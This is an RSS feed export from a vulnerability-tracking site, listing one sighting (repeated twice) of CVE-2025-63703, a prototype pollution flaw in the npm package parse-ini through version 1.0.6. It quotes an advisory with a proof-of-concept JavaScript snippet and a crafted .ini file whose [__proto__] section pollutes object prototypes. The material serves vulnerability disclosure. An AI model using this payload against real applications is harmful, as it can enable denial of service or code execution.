https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Tue, 02 Jun 2026 03:32:57 +0000 https://vulnerability.circl.lu/sighting/830b981a-e156-4360-88a1-ca32e1c54074/export {"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"} {"uuid": "830b981a-e156-4360-88a1-ca32e1c54074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63703", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-63703\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"} https://vulnerability.circl.lu/sighting/830b981a-e156-4360-88a1-ca32e1c54074/export Wed, 06 May 2026 19:46:52 +0000